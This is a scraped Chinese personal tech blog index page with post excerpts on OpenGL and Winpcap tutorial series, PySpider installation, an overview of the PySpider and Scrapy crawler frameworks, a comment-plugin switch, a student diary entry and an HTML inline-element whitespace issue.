datetime="2016-02-11T21:50:19+08:00">2016-02-11</time> 阅读次数： 本文字数： 250 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2467.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> C/C++ </a> <a href="/2467.html" class="post-title-link" itemprop="url">OpenGL绘图学习总结</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="目录索引"><a href="#目录索引" class="headerlink" title="目录索引"></a>目录索引</h2> <ol> <li><a href="http://cuiqingcai.com/1597.html">OpenGL绘图实例一之机器人的绘制</a> 2. <a href="http://cuiqingcai.com/1613.html">OpenGL绘图实例二之直线和圆弧的绘制</a> 3. O<a href="http://cuiqingcai.com/1640.html">penGL绘图实例三之种子填充算法</a> 4. <a href="http://cuiqingcai.com/1649.html">OpenGL绘图实例四之区域颜色填充</a> 5. <a href="http://cuiqingcai.com/1658.html">OpenGL绘图实例五之平移缩放旋转</a> 6. <a href="http://cuiqingcai.com/1776.html">OpenGL绘图实例六之鼠标监听事件</a> 7. <a href="http://cuiqingcai.com/1783.html">OpenGL绘图实例七之鼠标设色取点绘图</a> 7. <a href="http://cuiqingcai.com/1802.html">OpenGL绘图实例八之图形的移动删除存盘</a> 9. <a href="http://cuiqingcai.com/1860.html">OpenGL绘图实例九之3D绘图基础</a> 10. <a href="http://cuiqingcai.com/1867.html">OpenGL绘图实例十之绘制3D机器人</a></li> </ol> </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-11 21:42:24" itemprop="dateCreated datePublished" datetime="2016-02-11T21:42:24+08:00">2016-02-11</time> 阅读次数： 本文字数： 211 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2465.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> C/C++ </a> <a href="/2465.html" class="post-title-link" itemprop="url">Winpcap网络编程学习探究</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="目录索引"><a href="#目录索引" class="headerlink" title="目录索引"></a>目录索引</h2> 1. <a href="http://cuiqingcai.com/1890.html">Winpcap网络编程一之前言，实验要求，实验目标</a> 2. <a href="http://cuiqingcai.com/1898.html">Winpcap网络编程二之环境配置，Eclipse配置C/C++环境</a> 3. <a href="http://cuiqingcai.com/1906.html">Winpcap网络编程三之环境配置，Eclipse配置Winpcap环境</a> 4. <a href="http://cuiqingcai.com/1913.html">Winpcap网络编程四之环境配置，VS配置Winpcap环境</a> 5. <a href="http://cuiqingcai.com/1918.html">Winpcap网络编程五之ARP协议获得MAC表及主机通信</a> 6. <a href="http://cuiqingcai.com/1922.html">Winpcap网络编程六之两台主机通过中间主机通信</a> </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-11 21:27:53" itemprop="dateCreated datePublished" datetime="2016-02-11T21:27:53+08:00">2016-02-11</time> 阅读次数： 本文字数： 196 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2443.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Python </a> <a href="/2443.html" class="post-title-link" itemprop="url">Python爬虫进阶二之PySpider框架安装配置</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="2022-年最新-Python3-网络爬虫教程"><a href="#2022-年最新-Python3-网络爬虫教程" class="headerlink" title="2022 年最新 Python3 网络爬虫教程"></a>2022 年最新 Python3 网络爬虫教程</h2> 大家好，我是崔庆才，由于爬虫技术不断迭代升级，一些旧的教程已经过时、案例已经过期，最前沿的爬虫技术比如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等技术层出不穷，我最近新出了一套最新最全面的 Python3 网络爬虫系列教程。 <blockquote> 博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。 </blockquote> 最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。 教程请移步： <a href="https://cuiqingcai.com/17777.html">【2022 版】Python3 网络爬虫学习教程</a> 如下为原文。 <h2 id="关于"><a href="#关于" class="headerlink" title="关于"></a>关于</h2> 首先，在此附上项目的地址，以及官方文档 <a href="https://github.com/binux/pyspider" target="_blank" rel="noopener">PySpider</a> <a href="http://docs.pyspider.org/en/latest/" target="_blank" rel="noopener">官方文档</a> <h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2> <h3 id="1-pip"><a href="#1-pip" class="headerlink" title="1. pip"></a>1. pip</h3> 首先确保你已经安装了 pip，若没有安装，请参照 <a href="http://pip-cn.readthedocs.org/en/latest/installing.html" target="_blank" rel="noopener">pip 安装</a> <h3 id="2-phantomjs"><a href="#2-phantomjs" class="headerlink" title="2. phantomjs"></a>2. phantomjs</h3> PhantomJS 是一个基于 WebKit 的服务器端 JavaScript API。它全面支持 web 而不需浏览器支持，其快速、原生支持各种 Web 标准：DOM 处理、CSS 选择器、JSON、Canvas 和 SVG。 PhantomJS 可以用于页面自动化、网络监测、网页截屏以及无界面测试等。 <a href="http://phantomjs.org/download.html" target="_blank" rel="noopener">安装</a> 以上附有官方安装方式，如果你是 Ubuntu 或 Mac OS X 用户，可以直接用命令来安装 Ubuntu: <figure class="highlight routeros"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo apt-get install phantomjs </pre> </td> </tr> </table> </figure> Mac OS X: <figure class="highlight mipsasm"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>brew install phantomjs </pre> </td> </tr> </table> </figure> <h3 id="3-pyspider"><a href="#3-pyspider" class="headerlink" title="3. pyspider"></a>3. pyspider</h3> 直接利用 pip 安装即可 <figure class="highlight cmake"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>pip install pyspider </pre> </td> </tr> </table> </figure> 如果你是 Ubuntu 用户，请提前安装好以下支持类库 <figure class="highlight vim"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>sudo apt-get install python python-dev python-distribute python-pip libcurl4-openssl-dev libxml2-dev libxslt1-dev python-lxml </pre> </td> </tr> </table> </figure> 测试如果安装过程没有提示任何错误，那就证明一些 OK。命令行输入 <figure class="highlight ada"> <table> <tr> <td class="gutter"> <pre>1 </pre> </td> <td class="code"> <pre>pyspider all </pre> </td> </tr> </table> </figure> 然后浏览器访问 <a href="http://localhost:5000" target="_blank" rel="noopener">http://localhost:5000</a> 观察一下效果，如果可以正常出现 PySpider 的页面，那证明一切 OK 在此附图一张，这是我写了几个爬虫之后的界面。 <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/2016-02-11-20.55.36.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/2016-02-11-20.55.36-1024x355.png" alt="2016-02-11 20.55.36"></a> 好，接下来我会进一步介绍这个框架的使用。 <h2 id="常见错误"><a href="#常见错误" class="headerlink" title="常见错误"></a>常见错误</h2> 我曾遇到过的一个错误： <a href="http://cuiqingcai.com/2703.html">PySpider HTTP 599: SSL certificate problem 错误的解决方法</a> ，后来在作者那发了 issue 得到了答案，其他的暂时没什么问题。不过发现有的小伙伴提了各种各样的问题啊，不过我确实都没遇到过，我再 Win10，Linux Ubuntu，Linux CentOS，Mac OS X 都成功运行。不过确实有些奇怪的问题，跑着跑着崩了，一点就崩了我也就比较纳闷了。如果大家有问题，可以看看作者项目里面有没有类似的 issue，另外也推荐大家直接到作者的 GitHub 上发 issue。毕竟，这个框架不是我写的。在此附上 Issue 地址： <a href="https://github.com/binux/pyspider/issues" target="_blank" rel="noopener">PySpider Issue</a> </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-11 21:00:04" itemprop="dateCreated datePublished" datetime="2016-02-11T21:00:04+08:00">2016-02-11</time> 阅读次数： 本文字数： 1.3k 阅读时长 ≈ 1 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2433.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> Python </a> <a href="/2433.html" class="post-title-link" itemprop="url">Python爬虫进阶一之爬虫框架概述</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="2022-年最新-Python3-网络爬虫教程"><a href="#2022-年最新-Python3-网络爬虫教程" class="headerlink" title="2022 年最新 Python3 网络爬虫教程"></a>2022 年最新 Python3 网络爬虫教程</h2> 大家好，我是崔庆才，由于爬虫技术不断迭代升级，一些旧的教程已经过时、案例已经过期，最前沿的爬虫技术比如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等技术层出不穷，我最近新出了一套最新最全面的 Python3 网络爬虫系列教程。 <blockquote> 博主自荐：截止 2022 年，可以将最前沿最全面的爬虫技术都涵盖的教程，如异步、JavaScript 逆向、安卓逆向、智能解析、WebAssembly、大规模分布式、Kubernetes 等，市面上目前就这一套了。 </blockquote> 最新教程对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，保证案例稳定有效不过期。 教程请移步： <a href="https://cuiqingcai.com/17777.html">【2022 版】Python3 网络爬虫学习教程</a> 如下为原文。 <h2 id="综述"><a href="#综述" class="headerlink" title="综述"></a>综述</h2> 爬虫入门之后，我们有两条路可以走。一个是继续深入学习，以及关于设计模式的一些知识，强化Python相关知识，自己动手造轮子，继续为自己的爬虫增加分布式，多线程等功能扩展。另一条路便是学习一些优秀的框架，先把这些框架用熟，可以确保能够应付一些基本的爬虫任务，也就是所谓的解决温饱问题，然后再深入学习它的源码等知识，进一步强化。就个人而言，前一种方法其实就是自己动手造轮子，前人其实已经有了一些比较好的框架，可以直接拿来用，但是为了自己能够研究得更加深入和对爬虫有更全面的了解，自己动手去多做。后一种方法就是直接拿来前人已经写好的比较优秀的框架，拿来用好，首先确保可以完成你想要完成的任务，然后自己再深入研究学习。第一种而言，自己探索的多，对爬虫的知识掌握会比较透彻。第二种，拿别人的来用，自己方便了，可是可能就会没有了深入研究框架的心情，还有可能思路被束缚。不过个人而言，我自己偏向后者。造轮子是不错，但是就算你造轮子，你这不也是在基础类库上造轮子么？能拿来用的就拿来用，学了框架的作用是确保自己可以满足一些爬虫需求，这是最基本的温饱问题。倘若你一直在造轮子，到最后都没造出什么来，别人找你写个爬虫研究了这么长时间了都写不出来，岂不是有点得不偿失？所以，进阶爬虫我还是建议学习一下框架，作为自己的几把武器。至少，我们可以做到了，就像你拿了把枪上战场了，至少，你是可以打击敌人的，比你一直在磨刀好的多吧？ <h2 id="框架概述"><a href="#框架概述" class="headerlink" title="框架概述"></a>框架概述</h2> 博主接触了几个爬虫框架，其中比较好用的是 Scrapy 和PySpider。就个人而言，pyspider上手更简单，操作更加简便，因为它增加了 WEB 界面，写爬虫迅速，集成了phantomjs，可以用来抓取js渲染的页面。Scrapy自定义程度高，比 PySpider更底层一些，适合学习研究，需要学习的相关知识多，不过自己拿来研究分布式和多线程等等是非常合适的。在这里博主会一一把自己的学习经验写出来与大家分享，希望大家可以喜欢，也希望可以给大家一些帮助。 <h2 id="PySpider"><a href="#PySpider" class="headerlink" title="PySpider"></a>PySpider</h2> <a href="https://github.com/binux/pyspider" target="_blank" rel="noopener">PySpider</a>是<a href="https://github.com/binux" target="_blank" rel="noopener">binux</a>做的一个爬虫架构的开源化实现。主要的功能需求是： <ul> <li>抓取、更新调度多站点的特定的页面</li> <li>需要对页面进行结构化信息提取</li> <li>灵活可扩展，稳定可监控</li> </ul> 而这也是绝大多数python爬虫的需求 —— 定向抓取，结构化化解析。但是面对结构迥异的各种网站，单一的抓取模式并不一定能满足，灵活的抓取控制是必须的。为了达到这个目的，单纯的配置文件往往不够灵活，于是，通过脚本去控制抓取是最后的选择。而去重调度，队列，抓取，异常处理，监控等功能作为框架，提供给抓取脚本，并保证灵活性。最后加上web的编辑调试环境，以及web任务监控，即成为了这套框架。 pyspider的设计基础是：以python脚本驱动的抓取环模型爬虫 <ul> <li>通过python脚本进行结构化信息的提取，follow链接调度抓取控制，实现最大的灵活性</li> <li>通过web化的脚本编写、调试环境。web展现调度状态</li> <li>抓取环模型成熟稳定，模块间相互独立，通过消息队列连接，从单进程到多机分布式灵活拓展</li> </ul> <img src="http://blog.binux.me/assets/image/pyspider-arch.png" alt="pyspider-arch"> pyspider的架构主要分为 scheduler（调度器）, fetcher（抓取器）, processor（脚本执行）： <ul> <li>各个组件间使用消息队列连接，除了scheduler是单点的，fetcher 和 processor 都是可以多实例分布式部署的。 scheduler 负责整体的调度控制</li> <li>任务由 scheduler 发起调度，fetcher 抓取网页内容， processor 执行预先编写的python脚本，输出结果或产生新的提链任务（发往 scheduler），形成闭环。</li> <li>每个脚本可以灵活使用各种python库对页面进行解析，使用框架API控制下一步抓取动作，通过设置回调控制解析动作。</li> </ul> <h2 id="Scrapy"><a href="#Scrapy" class="headerlink" title="Scrapy"></a>Scrapy</h2> <blockquote> Scrapy是一个为了爬取网站数据，提取结构性数据而编写的应用框架。可以应用在包括数据挖掘，信息处理或存储历史数据等一系列的程序中。其最初是为了页面抓取 (更确切来说, 网络抓取 )所设计的，也可以应用在获取API所返回的数据(例如 Amazon Associates Web Services ) 或者通用的网络爬虫。Scrapy用途广泛，可以用于数据挖掘、监测和自动化测试 </blockquote> Scrapy 使用了 Twisted 异步网络库来处理网络通讯。整体架构大致如下 <img src="http://newtonblogimg.qiniudn.com/Scrapy%20Architecture.png" alt="Scrapy"> Scrapy主要包括了以下组件： <ul> <li>引擎(Scrapy): 用来处理整个系统的数据流处理, 触发事务(框架核心)</li> <li>调度器(Scheduler): 用来接受引擎发过来的请求, 压入队列中, 并在引擎再次请求的时候返回. 可以想像成一个URL（抓取网页的网址或者说是链接）的优先队列, 由它来决定下一个要抓取的网址是什么, 同时去除重复的网址</li> <li>下载器(Downloader): 用于下载网页内容, 并将网页内容返回给蜘蛛(Scrapy下载器是建立在twisted这个高效的异步模型上的)</li> <li>爬虫(Spiders): 爬虫是主要干活的, 用于从特定的网页中提取自己需要的信息, 即所谓的实体(Item)。用户也可以从中提取出链接,让Scrapy继续抓取下一个页面</li> <li>项目管道(Pipeline): 负责处理爬虫从网页中抽取的实体，主要的功能是持久化实体、验证实体的有效性、清除不需要的信息。当页面被爬虫解析后，将被发送到项目管道，并经过几个特定的次序处理数据。</li> <li>下载器中间件(Downloader Middlewares): 位于Scrapy引擎和下载器之间的框架，主要是处理Scrapy引擎与下载器之间的请求及响应。</li> <li>爬虫中间件(Spider Middlewares): 介于Scrapy引擎和爬虫之间的框架，主要工作是处理蜘蛛的响应输入和请求输出。</li> <li>调度中间件(Scheduler Middewares): 介于Scrapy引擎和调度之间的中间件，从Scrapy引擎发送到调度的请求和响应。</li> </ul> Scrapy运行流程大概如下： <ul> <li>首先，引擎从调度器中取出一个链接(URL)用于接下来的抓取</li> <li>引擎把URL封装成一个请求(Request)传给下载器，下载器把资源下载下来，并封装成应答包(Response)</li> <li>然后，爬虫解析Response</li> <li>若是解析出实体（Item）,则交给实体管道进行进一步的处理。</li> <li>若是解析出的是链接（URL）,则把URL交给Scheduler等待抓取</li> </ul> <h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2> 对这两个框架进行基本的介绍之后，接下来我会介绍这两个框架的安装以及框架的使用方法，希望对大家有帮助。 </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-11 20:29:29" itemprop="dateCreated datePublished" datetime="2016-02-11T20:29:29+08:00">2016-02-11</time> 阅读次数： 本文字数： 3k 阅读时长 ≈ 3 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2416.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> 个人随笔 </a> <a href="/2416.html" class="post-title-link" itemprop="url">弃用多说，改用畅言</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> 最近博客的多说评论总是抽风，先来吐槽一下。刚在整理评论的时候吓我一跳，之前我的好多评论都没了，是的，是只有我自己的评论没有了，而其它人的评论还有。摸不着头脑的我打开多说后台管理，哦天，我之前所有的评论和回复全部自动转为垃圾评论了，八百多条啊，废了一会功夫好不容易批量还原了。结果刷新页面一看，咦，还是没有，重新刷一下后台，竟然再次把我的评论设成垃圾评论了，后来又退出重新绑定了其它平台的账号，总算还原回来了。然后我就继续开始回复大家的评论呀，结果要发布评论的时候，点一下发布，按钮就卡在正在发布这里不动了。打开浏览器看一下 Ajax 出了什么问题，结果出现了一个 create_json 报了个 500 服务器错误，查看页面信息显示参数配置不正确还是怎么了，没错，是显示我的站点多说评论配置不正确。那，其它人怎么评论上来的？另外，之前，多说崩溃了已经不知道多少次了。真是不爽的多说。另外，多说还有一个非常令人发指的行为，会自动同步用户文章，收集用户信息，同步我们社交账号，即使是修改用户信息也要进行备份，这尼玛发展一定程度，多说还真有可能有利用这些用户信息谋利，甚至可能利用各个用户的文章做一个个性化阅读推荐也说不定。当然最开始的时候我只是觉得多说比较火，当时用上了也感觉比较方便，加上最初网站没几个东西，心想同步就同步呗，然后就一直用着了。现在再想想，也是可怕。果断！弃用！弃用！弃用！搜索了网上比较热门的评论插件，发现了畅言。使用了 WordPress 插件。于是用上了，不过还是有一些令我感到不是太友好的地方，简单在此提一下。嗯，首先我是比较追求美感的，界面问题。首先我会关注有没有个性化主题定制这个功能，畅言还是有的，支持 CSS 自定义。不过这个功能比较蛋疼，如果你不选择已经提供的主题，而是选择自定义 CSS 样式的话，你需要把所有样式重写一遍，它缺省继承了默认主题。比如我如果想在浅色主题红色风格基础上修改几个样式的话，这是办不到的，除非重写所有的红色风格样式，这就鸡肋了。建议可以选择继承某个默认主题的功能，然后自定义的 CSS 是在这个基础上设置的功能。而且我看 WAP 版本并没有自定义 CSS，非常建议增加这个功能。最后我还是选择了红色主题，不过自定义样式就写在了站点全局样式表里面了，以此解决。其次，同步本地评论功能，由于换了插件，所以评论都留在了本地了。同步完成之后，我并不能在畅言后台管理看到我刚才同步的评论，但是新发的评论是可以看到的，页面也是可以正常显示的。只是不能在线管理早先的原始评论了。另外，头像问题，其实我个人非常不能忍受一个账号没有头像的行为，简直是大逆不道。畅言有个 QQ 快速登录的功能，然而，登录之后竟然不能获取我的 QQ 头像！不知道是不是我这边的问题，如果大家正常希望可以反馈我一下。另外，QQ 登录之后怎么会给我取了一个奇怪的用户名，叫什么 cmcccc，有点醉。而微博的快速登录的昵称和头像都是正常的，然而每次评论的时候都会默认勾选那个同步到微博的按钮，这个可以默认取消么？还有，希望可以增加更多的平台的支持，比如微信、GitHub、脸书、推特等平台啦。最后，有没有发表文章自动分享到各个平台的功能？我暂时没有发现。这点多说还是做得比较好的。以上。嗯，总之换上畅言之后用起来还是比较开心的，嘿嘿主要是改好了样式，看起来一阵舒爽。昂，没错，我就是颜控！有时候，我会因为一个样式不合我意而执着地去修改，即使要花费几个小时。有时候，我会因为一个应用的图标（没错，就是说的图标）太丑了而卸载掉，即使是它的功能再怎么好。有时候，我会因为一个屏幕膜有一点点损伤而去重新买一个新的。额，其实是因为今天给电脑贴膜折角了，我又花了几十块重新买了一个新的。有时候，我就是一个强迫症，在写上面三句话的时候，第一句原本是在第二行的，然而因为看起来长度参差不齐我就把它移动到了最上面。嗯，这第四句话要写得更长才行。好啦，貌似跑题了，时候不早啦，大家晚安。嗯，换上调教好的美美的畅言还是很开心的，文章前后呼应，拜～ <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/屏幕快照-2016-02-03-03.43.51.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2016/02/屏幕快照-2016-02-03-03.43.51-1024x622.png" alt="屏幕快照 2016-02-03 03.43.51"></a> 美美哒～ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-03 03:36:48" itemprop="dateCreated datePublished" datetime="2016-02-03T03:36:48+08:00">2016-02-03</time> 阅读次数： 本文字数： 1.7k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2401.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> 个人日记 </a> <a href="/2401.html" class="post-title-link" itemprop="url">强势回归博客，顺便祝大家小年快乐</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> Hello，时隔一个多月，终于再次回到博客啦，首先跟大家说声抱歉，许多评论没有及时回复感到非常抱歉，希望我现在给大家的回复为时不晚。距离上次在博客上写日记过去了几个月了吧。那时的我刚刚结束大学三年级。而现在，大四上半学期已经过半啦。这半年的时间可以说忙也可以说不忙。不忙是说这半年以来的课程比较轻松，只有四门选修课，学业负担比较轻。忙是说半年以来各种错综复杂的事情，许多事情需要好好安排一下时间才可以好好把握各个“进程”的合理分配。那么就从我上次日记开始总结一下吧。当时更新是去年七月十二日，刚大三放假不久。那个暑假前期过得可谓是心惊胆战呀，当时为了保研北京航空航天大学一直在紧张地复习准备。包括复习备考三年的专业课，还有准备C语言的上机考试。七月二十八二十九那两天机考和面试，不负众望，我顺利拿到了北京航空航天大学计算机科学与技术学院的Offer，心里的石头也落了地，当时看到通过面试的消息时真的激动得说不出口，这也算是我人生中为数不多的重大十字路口做出的一个选择吧。面试结束之后，我便留在了导师那边做项目，一些大数据处理和爬虫的项目。不过当时的项目个人感觉比较简单，所以就在整个八月份找了一份实习，PHP研发工程师的岗位，之前准备保研也一直没有找工作，这也算是我找的第一份工作吧，不求赚神马，只求充实一下我的假期，也学习一些新的东西。在这里顺便安利一下，公司名称是佳信德润，主打品牌是<a href="http://www.lingxi360.com/index.php" target="_blank" rel="noopener">灵析</a>，北京三环。在那边工作真的感觉特别舒心，虽然是创业公司，但是CEO玛丽老板（女哦）还有负责技术的柱子哥真的超级热情，为人特别好，谈吐之间就有一种亲切的感觉，那边的小伙伴十几个，相处地也十分融洽。在那边工作你不会有一种被忽视和指使的感觉，你可以随意向老板们发表自己的看法，甚至你可以与他们探讨代码问题，甚至公司某处的装饰啦，哪里的餐馆不错啦等等。有次我眼睛发炎，玛丽老板和柱子哥还特别关心我，亲自送到我医院，在这里再次说声谢谢，不知道你们是不是可以看到。我还记得小伙伴们一起拍公司写真，真的超赞。当然最主要的还是一起商讨项目进度，代码问题，接触到我之前没有接触过的新知识。在这里你可以负责许多事情，最大限度地发挥你的光和热。不是我打广告，如果有小伙伴们有意向做PHP，非常推荐你们过去，可以去他们<a href="http://www.lingxi360.com/index.php" target="_blank" rel="noopener">官网</a>发应聘哦。相信我，不会坑你的。实习时间真的过得很快，转眼一个月过去了，九月份来了，大四开学啦。因为需要开学以后办一些保研的相关手续，另外重要的事当然是陪妹纸啦嘿嘿，你懂得。开学之后就开始忙一些项目了。大四的课程不紧，趁着这大四的时光，多学点东西，以后这样的日子真不多了，好好珍惜。所以大四上学期的基调是，专注陪妹子，业余撸代码，顺便做做外包。请叫我全职男朋友，兼职程序猿。这半年以来做的项目不算多。首先，学习了Laravel框架，嗯，保证你学完之后就不想用其他的框架了。最开始是帮我的叔叔做一个拍电影的网站，规模还比较大，一直在完善中。另外在暑假实习的过程中发现了公司自己写了一款CMS框架，自己觉得还有许多功能可以添加，一些架构可以继续完善，所以决定自己写一个CMS，不仅算是练手，也算是造轮子吧。毕竟你写好了就是你自己的，用起来都是那么自然，假如来了个外包神马的，轻松应对分分钟的事，神马深度定制都是浮云。当然还有帮爸爸妈妈写的一个微信平台，在微信订餐售卖东西，嗯，这叫做自己动手实现O2O。另外就是一些零零散散的小外包，没事可以赚点外快养活一下自己。最近刚刚入手了自己人生中的第一台MAC，当然还是要感谢父亲大人的支持，自己的手头还是比较紧的，你懂得。嗯摒弃Windows，感觉撸代码的快感不止提升了几管气，也希望它可以陪我度过接下来许多年的学习时光。在这里也安利一下一个小店，微博上的<a href="http://weibo.com/u/2067562447?is_hot=1" target="_blank" rel="noopener">小闷小闷</a>，水果从她这里买，价格真的是十分公道啊，正品无误了，入手十几天了，感觉逼格提升了，心情也舒畅了，多年的Windows卡顿症也治好了～嗯，接下来的时间，爸爸妈妈年前工作辛苦，接下来几天我要去帮他们分担一下工作啦。最后，恭祝大家小年快乐，工作顺心，别跟钱过不去，开心最重要～欢欢喜喜过大年啦～ </div> </div> <div class="post-meta"> 作者 <a href="/authors/崔庆才" class="author" itemprop="url" rel="index">崔庆才</a> 发表于 <time title="创建时间：2016-02-01 20:20:53" itemprop="dateCreated datePublished" datetime="2016-02-01T20:20:53+08:00">2016-02-01</time> 阅读次数： 本文字数： 1.7k 阅读时长 ≈ 2 分钟 </div> </article> <article itemscope itemtype="http://schema.org/Article" class="post-block index" lang="zh-CN"> <link itemprop="mainEntityOfPage" href="https://cuiqingcai.com/2353.html"> <meta itemprop="image" content="/images/avatar.png"> <meta itemprop="name" content="崔庆才"> <meta itemprop="description" content="静觅丨崔庆才的个人站点专业为您提供爬虫教程,爬虫,Python,Python爬虫,Python爬虫教程,爬虫书的相关信息，想要了解更多详情，请联系我们。"> <meta itemprop="name" content="静觅"> <header class="post-header"> <h2 class="post-title" itemprop="name headline"> <a class="label"> HTML </a> <a href="/2353.html" class="post-title-link" itemprop="url">关于HTML内联元素一侧留白的浅谈</a> </h2> </header> <div class="post-body" itemprop="articleBody"> <div class="thumb"> <img itemprop="contentUrl" class="random"> </div> <div class="excerpt"> <h2 id="问题来源"><a href="#问题来源" class="headerlink" title="问题来源"></a>问题来源</h2> 在写代码的时候遇到了如下问题：使用了 bootstrap 框架来编写了一个页面，其中 input 元素两侧留有空白。然而用 JS 动态添加的同样的元素却不会出现这种情况。具体截图表现如下： <a href="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226212230.png" target="_blank" rel="noopener"><img src="http://cdn.cuiqingcai.com/wp-content/uploads/2015/12/20151226212230.png" alt="20151226212230"></a> 我们可以发现，第一行和而三行的代码是完全一样的，可是呈现的结果是截然不同的。 <a href="http://res.cuiqingcai.com/demo/inline.html" target="_blank" rel="noopener">在线测试样例</a> 大家是不是觉得很奇怪？没错，我也是。中间的那个缝隙是哪里来的呢？ <h2 id="刨根问底"><a href="#刨根问底" class="headerlink" title="刨根问底"></a>刨根问底</h2> 在这里感谢 <a href="http://wonderlee.me" target="_blank" rel="noopener">wonder</a> 同学的大力相助，才得以找到问题的所在。出现此问题的原因在于： <blockquote> html 中的内联元素在书写代码时，如果两元素代码之间有换行，浏览器会将其解释为空格。而这个空格是会被当作一个空白节点（nodeType 等于 3 的节点，就是文字节点） </blockquote> 